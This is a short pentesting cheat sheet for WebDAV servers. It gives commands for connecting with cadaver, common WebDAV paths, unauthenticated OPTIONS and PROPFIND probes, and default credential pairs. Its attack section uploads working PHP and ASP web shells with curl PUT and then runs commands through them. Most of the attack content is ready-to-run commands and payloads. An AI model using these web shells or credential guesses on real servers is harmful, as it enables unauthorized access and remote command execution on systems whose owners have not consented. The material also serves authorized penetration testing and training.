Pentesting webdav
Source of this cheatsheet
HackViser
WebDAV is an extension of HTTP that allows clients to perform remote web content authoring operations. It enables users to collaboratively edit and manage files on remote web servers. WebDAV adds methods like PUT, DELETE, PROPFIND, and others to the standard HTTP methods. Common implementations include Microsoft IIS WebDAV, Apache mod_dav, and various cloud storage solutions. Misconfigurations can lead to file upload vulnerabilities and unauthorized access.
Connect
Using cadaver (WebDAV client)
| # Connect to WebDAV servercadaver http://target.com/webdav/
# With authenticationcadaver http://target.com/webdav/
Username:admin
Password: password
# HTTPS connectioncadaver https://target.com/webdav/
# Once connected, use DAV commands:
dav:/webdav/> ls
dav:/webdav/> put localfile.txt
dav:/webdav/> get remotefile.txt
dav:/webdav/> delete file.txt
|
WebDAV Path Discovery
Discover common WebDAV paths and endpoints.
| # Common paths
/webdav/
/dav/
/WebDAV/
/uploads/
/files/
/_vti_bin/
/sharepoint/
|
Attack vectors
Authentication Bypass
Test for WebDAV authentication bypass vulnerabilities.
| # Try without credentials
curl -X OPTIONS http://target.com/webdav/
curl -X PROPFIND http://target.com/webdav/
# Try with default credentials
admin:admin
admin:password
webdav:webdav
# Test authentication
curl -X PROPFIND http://target.com/webdav/ -u admin:admin
|
File Upload (PUT Method)
Upload malicious files using WebDAV PUT method.
| # Upload PHP webshell
curl -X PUT http://target.com/webdav/shell.php \ -u username:password \ -d '<?php system($_GET["cmd"]); ?>'
# Access shell
curl http://target.com/webdav/shell.php?cmd=whoami
# Upload ASP webshell
curl -X PUT http://target.com/webdav/shell.asp \ -u username:password \ -d '<%=CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()%>'
# Upload other file types
curl -X PUT http://target.com/webdav/shell.txt \ -u username:password \ --data-binary @shell.php
|